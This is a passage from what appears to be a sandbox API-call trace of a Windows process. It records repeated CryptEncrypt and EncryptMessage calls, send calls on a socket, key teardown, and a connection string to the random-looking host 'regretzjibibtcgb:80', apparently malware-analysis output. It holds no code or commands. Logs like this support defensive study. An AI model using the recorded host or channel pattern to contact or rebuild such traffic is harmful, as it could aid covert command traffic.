hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] malloc (_Size=0x1fd) returned 0x3def428 [0189.344] free (_Block=0x0) [0189.344] free (_Block=0x0) [0189.344] free (_Block=0x60ead0) [0189.344] free (_Block=0x606108) [0189.344] malloc (_Size=0x1fd) returned 0x606108 [0189.344] free (_Block=0x0) [0189.344] malloc (_Size=0x1fd) returned 0x3def630 [0189.344] free (_Block=0x0) [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.344] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.345] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.346] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.346] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.346] malloc (_Size=0x1fd) returned 0x60ead0 [0189.346] free (_Block=0x0) [0189.346] free (_Block=0x3def428) [0189.346] free (_Block=0x3def630) [0189.346] free (_Block=0x606108) [0189.346] malloc (_Size=0x202) returned 0x606108 [0189.346] free (_Block=0x0) [0189.346] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f3c4, MessageSeqNo=0x0 | out: pMessage=0x316f3c4) returned 0x0 [0189.346] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0189.346] free (_Block=0x606108) [0189.346] free (_Block=0x3f699c0) [0189.347] free (_Block=0x60ead0) [0189.347] free (_Block=0x3def010) [0189.347] free (_Block=0x60e6c0) [0189.347] free (_Block=0x3dd4a20) [0189.347] free (_Block=0x3f654c0) [0189.347] GetTickCount () returned 0x116ff85 [0189.347] malloc (_Size=0x10) returned 0x3648de8 [0189.347] free (_Block=0x0) [0189.347] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648de8*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0189.347] free (_Block=0x3648de8) [0189.347] GetTickCount () returned 0x116ff85 [0189.347] malloc (_Size=0x10) returned 0x3648d58 [0189.347] free (_Block=0x0) [0189.347] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d58*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0189.700] free (_Block=0x3648d58) [0189.700] GetTickCount () returned 0x11700ed [0189.700] GetTickCount () returned 0x11700ed [0189.700] malloc (_Size=0x10) returned 0x3648c50 [0189.700] free (_Block=0x0) [0189.700] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648c50*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0189.700] free (_Block=0x3648c50) [0189.700] GetTickCount () returned 0x11700ed [0189.700] malloc (_Size=0x10) returned 0x3648e30 [0189.700] free (_Block=0x0) [0189.700] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e30*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0190.393] free (_Block=0x3648e30) [0190.393] GetTickCount () returned 0x117039c [0190.393] malloc (_Size=0x202) returned 0x606108 [0190.393] free (_Block=0x0) [0190.394] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f484, MessageSeqNo=0x0 | out: pMessage=0x316f484) returned 0x0 [0190.394] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0190.394] free (_Block=0x606108) [0190.394] free (_Block=0x0) [0190.394] CryptDestroyKey (hKey=0x432af8) returned 1 [0190.395] free (_Block=0x3691270) [0190.395] CryptDestroyHash (hHash=0x4328f8) returned 1 [0190.395] CryptDestroyHash (hHash=0x432778) returned 1 [0190.395] CryptDestroyKey (hKey=0x432738) returned 1 [0190.395] CryptDestroyKey (hKey=0x432b78) returned 1 [0190.395] free (_Block=0x3df0550) [0190.395] free (_Block=0x3624370) [0190.395] CryptDestroyKey (hKey=0x4329f8) returned 1 [0190.396] free (_Block=0x36915b0) [0190.396] CryptDestroyHash (hHash=0x432bb8) returned 1 [0190.396] CryptDestroyHash (hHash=0x432978) returned 1 [0190.396] CryptDestroyKey (hKey=0x432bf8) returned 1 [0190.396] CryptDestroyKey (hKey=0x432a38) returned 1 [0190.396] free (_Block=0x3d81e60) [0190.396] free (_Block=0x36246f0) [0190.396] SetEvent (hEvent=0x380) returned 1 [0190.396] SetEvent (hEvent=0x5b0) returned 1 [0190.396] free (_Block=0x3648f08) [0190.396] free (_Block=0x0) [0190.396] CloseHandle (hObject=0x5b0) returned 1 [0190.396] CloseHandle (hObject=0x380) returned 1 [0190.396] free (_Block=0x3d9aae8) [0190.396] _vscprintf (_Format="%s:%hi", _ArgList=0x316f528) returned 19 [0190.396] malloc (_Size=0x14) returned 0x3f65280 [0190.396] free (_Block=0x0) [0190.396] vsprintf_s (in: _DstBuf=0x3f65280, _SizeInBytes=0x14, _Format="%s:%hi", _ArgList=0x316f528 | out: _DstBuf="regretzjibibtcgb:80") returned 19 [0190.396] malloc (_Size=0x14) returned 0x3f65460 [0190.396] free (_Block=0x0) [0190.397] malloc (_Size=0x78) returned 0x3d66d30 [0190.397] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0190.397] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5b0 [0190.397] malloc (_Size=0x20) returned 0x3d80288 [0190.397] free (_Block=0x0) [0190.397] SetEvent (hEvent=0x3a4) returned 1 [0190.397] malloc (_Size=0x14) returned 0x3f653c0 [0190.397] free (_Block=0x0) [0190.397] free (_Block=0x0) [0190.397] malloc (_Size=0x1fd) returned 0x606108 [0190.397] free (_Block=0x0) [0190.397] CryptHashData (hHash=0x432d78, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0190.397] CryptDuplicateHash (in: hHash=0x432d78, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f4ac | out: phHash=0x316f4ac) returned 1 [0190.397] malloc (_Size=0x14) returned 0x3f65480 [0190.397] free (_Block=0x0) [0190.397] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x316f444, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x316f444) returned 1 [0190.397] CryptDestroyHash (hHash=0x432e78) returned 1 [0190.397] free (_Block=0x3f65480) [0190.397] malloc (_Size=0x1fd) returned 0x3d81e60 [0190.397] free (_Block=0x0) [0190.397] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.397] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.398] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] malloc 